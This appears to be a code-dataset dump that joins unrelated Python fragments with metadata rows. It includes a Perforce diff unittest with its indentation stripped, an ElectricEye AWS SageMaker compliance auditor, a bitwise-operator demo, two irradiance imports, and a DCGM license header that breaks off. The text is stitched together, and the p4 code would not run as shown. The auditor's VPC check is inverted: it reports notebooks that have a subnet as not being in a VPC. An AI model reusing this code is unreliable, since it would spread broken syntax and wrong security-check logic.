results = p4.diff(fname)
self.failIf(results)
results = p4.diff(fname, force=1)
result = results[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
finally:
os.chdir(top)
def test_diff_binary(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file (make it binary).
fname = 'test_diff_binary.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname, filetype='binary')
p4.submit(fname, 'for test_diff_binary')
# Open for edit and make a change.
p4.edit(fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
result = p4.diff(fname)[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(type(result['notes']) == types.ListType)
self.failIf(result.has_key('text'))
result = p4.diff(fname, text=1)[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
self.failIf(result.has_key('notes'))
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_bogus_args(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_bogus_args.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_bogus_args')
# Open for edit and make a change.
p4.edit(fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
self.failUnlessRaises(P4LibError, p4.diff, fname, diffFormat='q')
self.failUnlessRaises(P4LibError, p4.diff, fname, satisfying='q')
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_multiple_files(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname1 = 'test_diff_multiple_files_1.txt'
fname2 = 'test_diff_multiple_files_2.txt'
fnames = [fname1, fname2]
for fname in fnames:
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add([fname1, fname2])
p4.submit([fname1, fname2], 'for test_diff_multiple_files')
# Open for edit and make a change.
p4.edit(fnames)
for fname in fnames:
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fnames)
self.failUnless(len(results) == 2)
for result in results:
self.failUnless(os.path.basename(result['depotFile']) in fnames)
self.failUnless(os.path.basename(result['localFile']) in fnames)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
# cleanup
p4.revert(fnames)
finally:
os.chdir(top)
def suite():
"""Return a unittest.TestSuite to be used by test.py."""
return unittest.makeSuite(DiffTestCase)
| 33.949438
| 80
| 0.525732
| 1,431
| 12,086
| 4.373864
| 0.098532
| 0.078287
| 0.038664
| 0.051126
| 0.835757
| 0.817383
| 0.764978
| 0.741652
| 0.741652
| 0.704745
| 0
| 0.021253
| 0.342049
| 12,086
| 355
| 81
| 34.04507
| 0.765845
| 0.079927
| 0
| 0.719101
| 0
| 0
| 0.110332
| 0.031406
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026217
| null | null | 0.003745
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
91bdf2112ce580e0a05bb8a459808af05b8fad5f
| 30,958
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_SageMaker_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_SageMaker_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_SageMaker_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import datetime
import boto3
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
sagemaker = boto3.client("sagemaker")
@registry.register_check("sagemaker")
def sagemaker_notebook_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SageMaker.1] SageMaker notebook instance storage volumes should be encrypted"""
# loop through sagemaker notebooks
response = sagemaker.list_notebook_instances()
mySageMakerNotebooks = response["NotebookInstances"]
for notebooks in mySageMakerNotebooks:
notebookName = str(notebooks["NotebookInstanceName"])
response = sagemaker.describe_notebook_instance(NotebookInstanceName=notebookName)
notebookArn = str(response["NotebookInstanceArn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
notebookEncryptionCheck = str(response["KmsKeyId"])
print(notebookEncryptionCheck)
finding = {
"SchemaVersion": "2018-10-08",
"Id": notebookArn + "/sagemaker-notebook-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": notebookArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SageMaker.1] SageMaker notebook instance storage volumes should be encrypted",
"Description": "SageMaker notebook instance " + notebookName + " is encrypted.",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerNotebookInstance",
"Id": notebookArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"notebookName": notebookName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": notebookArn + "/sagemaker-notebook-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": notebookArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[SageMaker.1] SageMaker notebook instance storage volumes should be encrypted",
"Description": "SageMaker notebook instance "
+ notebookName
+ " is not encrypted. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerNotebookInstance",
"Id": notebookArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"notebookName": notebookName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("sagemaker")
def sagemaker_notebook_direct_internet_access_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SageMaker.2] SageMaker notebook instances should not have direct internet access configured"""
# loop through sagemaker notebooks
response = sagemaker.list_notebook_instances()
mySageMakerNotebooks = response["NotebookInstances"]
for notebooks in mySageMakerNotebooks:
notebookName = str(notebooks["NotebookInstanceName"])
response = sagemaker.describe_notebook_instance(NotebookInstanceName=notebookName)
notebookArn = str(response["NotebookInstanceArn"])
directInternetCheck = str(response["DirectInternetAccess"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if directInternetCheck == "Enabled":
finding = {
"SchemaVersion": "2018-10-08",
"Id": notebookArn + "/sagemaker-notebook-direct-internet-access-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": notebookArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[SageMaker.2] SageMaker notebook instances should not have direct internet access configured",
"Description": "SageMaker notebook instance "
+ notebookName
+ " has direct internet access configured. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker infrastructure protection refer to the Connect a Notebook Instance to Resources in a VPC section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerNotebookInstance",
"Id": notebookArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"notebookName": notebookName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-5",
"NIST SP 800-53 AC-4",
"NIST SP 800-53 AC-10",
"NIST SP 800-53 SC-7",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.1.3",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": notebookArn + "/sagemaker-notebook-direct-internet-access-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": notebookArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SageMaker.2] SageMaker notebook instances should not have direct internet access configured",
"Description": "SageMaker notebook instance "
+ notebookName
+ " does not have direct internet access configured.",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker infrastructure protection refer to the Connect a Notebook Instance to Resources in a VPC section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerNotebookInstance",
"Id": notebookArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"notebookName": notebookName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-5",
"NIST SP 800-53 AC-4",
"NIST SP 800-53 AC-10",
"NIST SP 800-53 SC-7",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.1.3",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("sagemaker")
def sagemaker_notebook_in_vpc_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SageMaker.3] SageMaker notebook instances should be placed in a VPC"""
# loop through sagemaker notebooks
response = sagemaker.list_notebook_instances()
mySageMakerNotebooks = response["NotebookInstances"]
for notebooks in mySageMakerNotebooks:
notebookName = str(notebooks["NotebookInstanceName"])
response = sagemaker.describe_notebook_instance(NotebookInstanceName=notebookName)
notebookArn = str(response["NotebookInstanceArn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
inVpcCheck = str(response["SubnetId"])
print(inVpcCheck)
finding = {
"SchemaVersion": "2018-10-08",
"Id": notebookArn + "/sagemaker-notebook-in-vpc-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": notebookArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SageMaker.3] SageMaker notebook instances should be placed in a VPC",
"Description": "SageMaker notebook instance "
+ notebookName
+ " is not in a VPC. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker infrastructure protection refer to the Connect a Notebook Instance to Resources in a VPC section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerNotebookInstance",
"Id": notebookArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"notebookName": notebookName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-5",
"NIST SP 800-53 AC-4",
"NIST SP 800-53 AC-10",
"NIST SP 800-53 SC-7",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.1.3",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": notebookArn + "/sagemaker-notebook-in-vpc-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": notebookArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SageMaker.3] SageMaker notebook instances should be placed in a VPC",
"Description": "SageMaker notebook instance " + notebookName + " is in a VPC.",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker infrastructure protection refer to the Connect a Notebook Instance to Resources in a VPC section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerNotebookInstance",
"Id": notebookArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"notebookName": notebookName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-5",
"NIST SP 800-53 AC-4",
"NIST SP 800-53 AC-10",
"NIST SP 800-53 SC-7",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.1.3",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("sagemaker")
def sagemaker_endpoint_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SageMaker.4] SageMaker endpoints should be encrypted"""
# loop through sagemaker endpoints
response = sagemaker.list_endpoints()
mySageMakerEndpoints = response["Endpoints"]
for endpoints in mySageMakerEndpoints:
endpointName = str(endpoints["EndpointName"])
response = sagemaker.describe_endpoint(EndpointName=endpointName)
endpointArn = str(response["EndpointArn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
dataCaptureEncryptionCheck = str(response["DataCaptureConfig"]["KmsKeyId"])
print(dataCaptureEncryptionCheck)
finding = {
"SchemaVersion": "2018-10-08",
"Id": endpointArn + "/sagemaker-endpoint-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": endpointArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SageMaker.4] SageMaker endpoints should be encrypted",
"Description": "SageMaker endpoint " + endpointName + " is encrypted.",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerEndpoint",
"Id": endpointArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"endpointName": endpointName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": endpointArn + "/sagemaker-endpoint-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": endpointArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[SageMaker.4] SageMaker endpoints should be encrypted",
"Description": "SageMaker endpoint "
+ endpointName
+ " is not encrypted. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerEndpoint",
"Id": endpointArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"endpointName": endpointName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("sagemaker")
def sagemaker_model_network_isolation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SageMaker.5] SageMaker models should have network isolation enabled"""
# loop through sagemaker models
response = sagemaker.list_models()
mySageMakerModels = response["Models"]
for models in mySageMakerModels:
modelName = str(models["ModelName"])
modelArn = str(models["ModelArn"])
response = sagemaker.describe_model(ModelName=modelName)
networkIsolationCheck = str(response["EnableNetworkIsolation"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if networkIsolationCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": modelArn + "/sagemaker-model-network-isolation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": modelArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SageMaker.5] SageMaker models should have network isolation enabled",
"Description": "SageMaker model "
+ modelName
+ " does not have network isolation enabled. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker model network isolation and how to configure it refer to the Training and Inference Containers Run in Internet-Free Mode section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/mkt-algo-model-internet-free.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerModel",
"Id": modelArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"modelName": modelName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-5",
"NIST SP 800-53 AC-4",
"NIST SP 800-53 AC-10",
"NIST SP 800-53 SC-7",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.1.3",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": modelArn + "/sagemaker-model-network-isolation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": modelArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SageMaker.5] SageMaker models should have network isolation enabled",
"Description": "SageMaker model " + modelName + " has network isolation enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on SageMaker model network isolation and how to configure it refer to the Training and Inference Containers Run in Internet-Free Mode section of the Amazon SageMaker Developer Guide",
"Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/mkt-algo-model-internet-free.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsSagemakerModel",
"Id": modelArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"Other": {"modelName": modelName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-5",
"NIST SP 800-53 AC-4",
"NIST SP 800-53 AC-10",
"NIST SP 800-53 SC-7",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.1.3",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
| 49.851852
| 237
| 0.496608
| 2,499
| 30,958
| 6.135654
| 0.111245
| 0.01774
| 0.026609
| 0.028827
| 0.887824
| 0.886128
| 0.881106
| 0.875302
| 0.875302
| 0.871062
| 0
| 0.049487
| 0.395568
| 30,958
| 621
| 238
| 49.851852
| 0.769934
| 0.04364
| 0
| 0.821918
| 0
| 0.034247
| 0.403538
| 0.049186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008562
| false
| 0.008562
| 0.005137
| 0
| 0.013699
| 0.005137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91c67c7f22007ae225f1c33a054359b4b5cab5aa
| 188
|
py
|
Python
|
12 oporators/BitwiseOper.py
|
codewithsandy/Python-Basic-Exp
|
4c70ada4a042923a94301453c7bd76e704cd2989
|
[
"MIT"
] | 3
|
2021-05-08T13:11:41.000Z
|
2021-05-14T02:43:20.000Z
|
12 oporators/BitwiseOper.py
|
codewithsandy/Python-Basic-Exp
|
4c70ada4a042923a94301453c7bd76e704cd2989
|
[
"MIT"
] | null | null | null |
12 oporators/BitwiseOper.py
|
codewithsandy/Python-Basic-Exp
|
4c70ada4a042923a94301453c7bd76e704cd2989
|
[
"MIT"
] | null | null | null |
print("Bitwise Operator")
# 0 - 00
# 1 - 01
# 2 - 10
# 3 - 11
print(0 | 1) # OR
print(0 | 2)
print(1 | 3)
print(2 | 3)
print(0 & 1) # AND
| 14.461538
| 25
| 0.382979
| 28
| 188
| 2.571429
| 0.464286
| 0.25
| 0.194444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217822
| 0.462766
| 188
| 13
| 26
| 14.461538
| 0.49505
| 0.37234
| 0
| 0
| 0
| 0
| 0.150943
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
91da7f3be2e73fea2e3f8e7a05b8aeb96d7d304c
| 133
|
py
|
Python
|
irradiance_synth/__init__.py
|
Ekistica/irradiance_synth
|
4f4c5cf9e898739b59066fdf56dd66e5f4b45e60
|
[
"MIT"
] | null | null | null |
irradiance_synth/__init__.py
|
Ekistica/irradiance_synth
|
4f4c5cf9e898739b59066fdf56dd66e5f4b45e60
|
[
"MIT"
] | null | null | null |
irradiance_synth/__init__.py
|
Ekistica/irradiance_synth
|
4f4c5cf9e898739b59066fdf56dd66e5f4b45e60
|
[
"MIT"
] | null | null | null |
from irradiance_synth.irradiance_dataset import IrradianceDataset
from irradiance_synth.irradiance_synth import IrradianceSynthesizer
| 66.5
| 67
| 0.932331
| 14
| 133
| 8.571429
| 0.5
| 0.375
| 0.316667
| 0.483333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 133
| 2
| 67
| 66.5
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
91dfd3aad9adc2bfdf9d26218df6c9880913e639
| 56,737
|
py
|
Python
|
testing/python3/tests/test_health.py
|
deepio/DCGM
|
d10273f18fb3d425da752ab6bb7e07af3d18caec
|
[
"Apache-2.0"
] | 85
|
2021-02-03T19:58:50.000Z
|
2022-03-21T08:00:11.000Z
|
testing/python3/tests/test_health.py
|
deepio/DCGM
|
d10273f18fb3d425da752ab6bb7e07af3d18caec
|
[
"Apache-2.0"
] | 19
|
2021-03-19T08:13:58.000Z
|
2022-03-17T02:50:41.000Z
|
testing/python3/tests/test_health.py
|
deepio/DCGM
|
d10273f18fb3d425da752ab6bb7e07af3d18caec
|
[
"Apache-2.0"
] | 17
|
2021-02-04T06:47:30.000Z
|
2022-03-21T22:14:03.000Z
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
